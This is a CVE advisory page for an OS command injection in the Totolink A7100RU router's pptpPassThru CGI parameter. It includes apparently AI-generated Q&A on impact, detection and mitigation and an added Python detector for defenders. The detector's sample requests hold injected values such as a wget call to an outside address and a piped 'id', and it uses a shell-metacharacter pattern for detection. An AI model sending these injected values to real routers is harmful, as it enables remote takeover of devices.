CVE-2026-5850
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-09
Last updated on: 2026-04-09
Assigner: VulDB
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The CVE-2026-5850 vulnerability allows remote attackers to execute arbitrary OS commands on the affected Totolink A7100RU router. This can lead to unauthorized access, data manipulation, or disruption of services.
Such unauthorized access and control over network devices can compromise the confidentiality, integrity, and availability of data, which are core principles in standards like GDPR and HIPAA.
Therefore, exploitation of this vulnerability could result in violations of these regulations by exposing personal or sensitive data, failing to protect data adequately, or causing service interruptions.
Can you explain this vulnerability to me?
CVE-2026-5850 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI script /cgi-bin/cstecgi.cgi, specifically in the function that handles the parameter pptpPassThru.
An attacker can send a specially crafted request with malicious content in the pptpPassThru parameter, which is then passed to a system command execution function without proper sanitization. This allows the attacker to execute arbitrary operating system commands remotely on the router.
A proof of concept shows that commands like downloading files via wget can be executed remotely, confirming the severity and exploitability of this vulnerability.
How can this vulnerability impact me?
This vulnerability allows remote attackers to execute arbitrary commands on the affected router without authentication.
- Attackers can take full control of the router, potentially altering its configuration or using it as a foothold to attack other devices on the network.
- It can lead to data interception, network disruption, or the installation of malicious software.
- Because the exploit is publicly available, the risk of exploitation is high.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the endpoint /cgi-bin/cstecgi.cgi that include the parameter pptpPassThru with unusual or command-like values.
A practical detection method is to capture and analyze HTTP traffic targeting the Totolink A7100RU router, specifically looking for POST requests containing the pptpPassThru parameter with injected commands such as wget or other shell commands.
Example command to detect such attempts using tcpdump on the network interface connected to the router (replace `<router_ip>` with the router's address):

```bash
tcpdump -A -s 0 'tcp port 80 and ((ip dst <router_ip>) and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354))'
```

The BPF filter matches TCP segments to the router whose payload begins with the bytes `POST` (0x504f5354), i.e. HTTP POST requests. You can then inspect the captured payload for the pptpPassThru parameter.
Alternatively, using curl or similar tools to test the vulnerability by sending a crafted POST request with a benign command in pptpPassThru can confirm if the router is vulnerable.
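The following Python script is an added example (not part of the advisory record) of the detection logic described above, run offline over a few constructed raw HTTP requests. It assumes that the parameter travels in the POST body either form-encoded or as a JSON object; the advisory does not state the encoding, so both are handled. A value is flagged when it contains shell metacharacters, since a legitimate pass-through toggle would not need any.

```python
"""Flag HTTP POST requests to /cgi-bin/cstecgi.cgi whose pptpPassThru
parameter carries shell metacharacters (an OS command injection indicator,
CWE-78). Added example; the request samples are CONSTRUCTED and the body
encoding (form vs JSON) is an assumption, not taken from the advisory."""
import json
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/cgi-bin/cstecgi.cgi"
PARAM = "pptpPassThru"

# Characters that let a value escape the intended command when it is
# concatenated into a shell invocation.
SHELL_META = re.compile(r"[;&|`$<>(){}\r\n]")

# Constructed sample requests; 192.0.2.1 / 203.0.113.5 are documentation addresses.
SAMPLE_REQUESTS = [
    # 0: benign toggle value
    "POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "pptpPassThru=1",
    # 1: form-encoded body with an injected wget (as the PoC described above)
    "POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "pptpPassThru=1%3Bwget+http%3A%2F%2F203.0.113.5%2F",
    # 2: JSON body with a pipe into another command
    "POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"pptpPassThru": "0|id"}',
    # 3: POST to an unrelated path; out of scope for this check
    "POST /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\npptpPassThru=1;id",
]


def extract_param(body: str) -> list[str]:
    """Return every pptpPassThru value found in a form-encoded or JSON body."""
    body = body.strip()
    if body.startswith("{"):
        try:
            data = json.loads(body)
        except json.JSONDecodeError:
            return []
        value = data.get(PARAM) if isinstance(data, dict) else None
        return [str(value)] if value is not None else []
    return parse_qs(body, keep_blank_values=True).get(PARAM, [])


def inspect_request(raw: str) -> dict:
    """Parse one raw HTTP request and report whether it matches the indicator."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ")
    result = {"method": parts[0], "path": "", "values": [], "suspicious": False}
    if len(parts) < 2:
        return result
    result["path"] = urlsplit(parts[1]).path
    if result["method"] != "POST" or result["path"] != TARGET_PATH:
        return result
    result["values"] = extract_param(body)
    result["suspicious"] = any(SHELL_META.search(v) for v in result["values"])
    return result


def scan(requests: list[str]) -> list[int]:
    """Indices of requests that look like injection attempts against the CGI handler."""
    return [i for i, r in enumerate(requests) if inspect_request(r)["suspicious"]]


if __name__ == "__main__":
    for i, raw in enumerate(SAMPLE_REQUESTS):
        info = inspect_request(raw)
        print(i, info["method"], info["path"], info["values"], "ALERT" if info["suspicious"] else "ok")
```

Feed the script reassembled request bodies (for example from the tcpdump capture above) rather than single packets, since a POST body may span segments. The metacharacter class is intentionally narrow so that it reads as an indicator, not a complete filter; a device-side fix would instead validate the parameter against the small set of values it legitimately takes.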
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the router's web interface, especially the /cgi-bin/cstecgi.cgi endpoint, to trusted networks only.
Disable or block remote management features if enabled, to prevent remote exploitation.
Monitor network traffic for suspicious POST requests containing the pptpPassThru parameter and block or alert on such activity.
If available, update the router firmware to a version that patches this vulnerability.
As a temporary workaround, consider implementing firewall rules to block HTTP POST requests to /cgi-bin/cstecgi.cgi or filter out requests containing pptpPassThru.